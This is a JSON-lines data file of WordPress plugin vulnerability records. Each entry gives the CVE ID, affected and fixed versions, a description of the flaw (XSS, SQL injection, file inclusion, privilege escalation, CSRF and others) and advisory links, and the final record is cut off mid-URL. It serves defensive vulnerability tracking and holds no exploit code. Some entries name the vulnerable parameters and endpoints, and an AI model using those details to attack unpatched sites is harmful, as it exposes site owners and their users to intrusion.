{"CVE_ID":"CVE-2024-2189","slug":"social-icons-widget-by-wpzoom","versionImpact":"4.2.17","versionEndExcluding":"4.2.18","description":"The Social Icons Widget & Block by WPZOOM WordPress plugin before 4.2.18 does not sanitise and escape some of its Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.2.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8661fbe-78b9-4d29-90bf-5b68af468eb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8661fbe-78b9-4d29-90bf-5b68af468eb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0493","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.14","versionEndExcluding":"4.2.15","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Limited Local File Inclusion in all versions up to, and including, 4.2.14 via the tabname parameter. This makes it possible for unauthenticated attackers to include PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.","recommendation":"Update to version 4.2.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.14\\\/classes\\\/class-mvx-ajax.php#L661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.14\\\/classes\\\/class-mvx-ajax.php#L661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.15\\\/classes\\\/class-mvx-ajax.php#L661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.15\\\/classes\\\/class-mvx-ajax.php#L661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812029d9-95d6-4bc9-98b2-700f462163b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812029d9-95d6-4bc9-98b2-700f462163b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13489","slug":"ltl-freight-quotes-odfl-edition","versionImpact":"4.2.10","versionEndExcluding":"4.2.11","description":"The LTL Freight Quotes \u2013 Old Dominion Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242160%40ltl-freight-quotes-odfl-edition&new=3242160%40ltl-freight-quotes-odfl-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242160%40ltl-freight-quotes-odfl-edition&new=3242160%40ltl-freight-quotes-odfl-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7d63fc-288b-4f2f-85cd-e94add07a536?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7d63fc-288b-4f2f-85cd-e94add07a536?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11282","slug":"content-protector","versionImpact":"4.2.10","versionEndExcluding":"4.2.11","description":"The Passster \u2013 Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.10 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 4.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211004\\\/content-protector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211004\\\/content-protector\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11782a65-30b9-400e-8fe0-ab9f05ba5e42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11782a65-30b9-400e-8fe0-ab9f05ba5e42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8289","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.0","versionEndExcluding":"4.2.1","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to privilege escalation\/de-escalation and account takeover due to an insufficient capability check on the update_item_permissions_check and create_item_permissions_check functions in all versions up to, and including, 4.2.0. This makes it possible for unauthenticated attackers to change the password of any user with the vendor role, create new users with the vendor role, and demote other users like administrators to the vendor role.","recommendation":"Update to version 4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85fbaff-d566-4ed2-8943-c174e0c4d2d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85fbaff-d566-4ed2-8943-c174e0c4d2d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L641\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L641\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L382\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L382\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-vendors-controller.php?rev=3145638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-vendors-controller.php?rev=3145638\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3476","slug":"side-menu-lite","versionImpact":"4.2","versionEndExcluding":"4.2.1","description":"The Side Menu Lite WordPress plugin before 4.2.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks.","recommendation":"Update to version 4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46f74493-9082-48b2-90bc-2c1d1db64ccd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46f74493-9082-48b2-90bc-2c1d1db64ccd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13730","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.2.0","versionEndExcluding":"4.2.1","description":"The Podlove Podcast Publisher WordPress plugin before 4.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4541a285-a095-4178-a64b-6a859eb5034e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4541a285-a095-4178-a64b-6a859eb5034e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12506","slug":"nacc-wordpress-plugin","versionImpact":"4.1.0","versionEndExcluding":"4.2.0","description":"The NACC WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nacc' shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d992b9dd-dfd1-497c-b09f-cca02dc87e34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d992b9dd-dfd1-497c-b09f-cca02dc87e34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11367","slug":"smoove-elementor","versionImpact":"4.1.0","versionEndExcluding":"4.2.0","description":"The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smoove-elementor\\\/tags\\\/3.0.3\\\/inc\\\/modules\\\/api-logs-table.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smoove-elementor\\\/tags\\\/3.0.3\\\/inc\\\/modules\\\/api-logs-table.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3951","slug":"wp-optimize","versionImpact":"4.1.1","versionEndExcluding":"4.2.0","description":"The WP-Optimize WordPress plugin before 4.2.0 does not properly escape user input when checking image compression statuses, which could allow users with the administrator role to conduct SQL Injection attacks in the context of Multi-Site WordPress configurations.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0554","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.1.25","versionEndExcluding":"4.2.0","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Feed Name value in version <= 4.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3217075%40podlove-podcasting-plugin-for-wordpress&new=3217075%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3217075%40podlove-podcasting-plugin-for-wordpress&new=3217075%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39d41772-49f3-4bce-a170-cbe64ba99184?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39d41772-49f3-4bce-a170-cbe64ba99184?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6630","slug":"contact-form-7-dynamic-text-extension","versionImpact":"4.1.0","versionEndExcluding":"4.2.0","description":"The Contact Form 7 \u2013 Dynamic Text Extension plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the CF7_get_custom_field and CF7_get_current_user shortcodes due to missing validation on a user controlled key. This makes it possible for authenticated attackers with contributor access or higher to access arbitrary metadata of any post type, referencing the post by id and the meta by key.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3f1d836-da32-414f-9f2b-d485c44b2486?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3f1d836-da32-414f-9f2b-d485c44b2486?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3019572%40contact-form-7-dynamic-text-extension%2Ftrunk&old=2968460%40contact-form-7-dynamic-text-extension%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3019572%40contact-form-7-dynamic-text-extension%2Ftrunk&old=2968460%40contact-form-7-dynamic-text-extension%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3170","slug":"td-composer","versionEndExcluding":"4.2","description":"The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not validate and escape some settings, which could allow users with Admin privileges to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95ff3c6-283b-4e5e-bea0-1f1375da08da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95ff3c6-283b-4e5e-bea0-1f1375da08da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3169","slug":"td-composer","versionEndExcluding":"4.2","description":"The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6d8216d-ace4-48ba-afca-74da0dc5abb5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6d8216d-ace4-48ba-afca-74da0dc5abb5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1337","slug":"skt-builder","versionImpact":"4.1","versionEndExcluding":"4.2","description":"The SKT Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saveSktbuilderPageData' function in all versions up to, and including, 4.1. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary content into pages.","recommendation":"Update to version 4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034383\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034383\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4751","slug":"word-balloon","versionEndExcluding":"4.19.3","description":"The Word Balloon WordPress plugin before 4.19.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd5cc04a-042d-402a-ab7a-96aff3d57478\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd5cc04a-042d-402a-ab7a-96aff3d57478\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-48333","slug":"wp-fsqm-pro","versionEndExcluding":"4.19.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPQuark eForm - WordPress Form Builder allows Reflected XSS. This issue affects eForm - WordPress Form Builder: from n\/a through n\/a.","recommendation":"Update to version 4.19.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-fsqm-pro\\\/vulnerability\\\/wordpress-eform-wordpress-form-builder-4-19-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-fsqm-pro\\\/vulnerability\\\/wordpress-eform-wordpress-form-builder-4-19-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1294","slug":"wp-fsqm-pro","versionImpact":"4.18.0","versionEndExcluding":"4.19","description":"The eForm - WordPress Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.18.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eform-wordpress-form-builder\\\/3180835\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eform-wordpress-form-builder\\\/3180835\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/eform.live\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/eform.live\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c5db375-e865-47ba-a3dd-462c55d066fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c5db375-e865-47ba-a3dd-462c55d066fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0285","slug":"real-media-library-lite","versionEndExcluding":"4.18.29","description":"The Real Media Library WordPress plugin before 4.18.29 does not sanitise and escape the created folder names, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adf09e29-baf5-4426-a281-6763c107d348\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adf09e29-baf5-4426-a281-6763c107d348\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4683","slug":"mstore-api","versionImpact":"4.17.5","versionEndExcluding":"4.17.6","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_blog function in all versions up to, and including, 4.17.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new posts.","recommendation":"Update to version 4.17.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293669\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293669\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335bd15-7af7-4d8b-ad01-b1d9e76beb53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335bd15-7af7-4d8b-ad01-b1d9e76beb53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3438","slug":"mstore-api","versionImpact":"4.17.4","versionEndExcluding":"4.17.5","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to limited privilege escalation in all versions up to, and including, 4.17.4. This is due to a lack of restriction of role when registering. This makes it possible for unauthenticated attackers to register with the 'wcfm_vendor' role, which is a Store Vendor role in the WCFM Marketplace \u2013 Multivendor Marketplace for WooCommerce plugin for WordPress. The vulnerability can only be exploited if the WCFM Marketplace \u2013 Multivendor Marketplace for WooCommerce plugin is installed and activated. The vulnerability was partially patched in version 4.17.3.","recommendation":"Update to version 4.17.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L392\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L392\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277790\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277790\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279132\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279132\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5d86ad-f94b-4fcb-9b74-ecddde2bf29d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5d86ad-f94b-4fcb-9b74-ecddde2bf29d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8678","slug":"revolut-gateway-for-woocommerce","versionImpact":"4.17.3","versionEndExcluding":"4.17.4","description":"The Revolut Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \/wc\/v3\/revolut REST API endpoint in all versions up to, and including, 4.17.3. This makes it possible for unauthenticated attackers to mark orders as completed.","recommendation":"Update to version 4.17.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74dad6f0-0760-4420-b8cc-dc84cafd9b0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74dad6f0-0760-4420-b8cc-dc84cafd9b0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153063\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153063\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8878","slug":"wp-user-avatar","versionImpact":"4.16.4","versionEndExcluding":"4.16.5","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 4.16.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Classes\\\/RegistrationAuth.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Classes\\\/RegistrationAuth.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L329\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar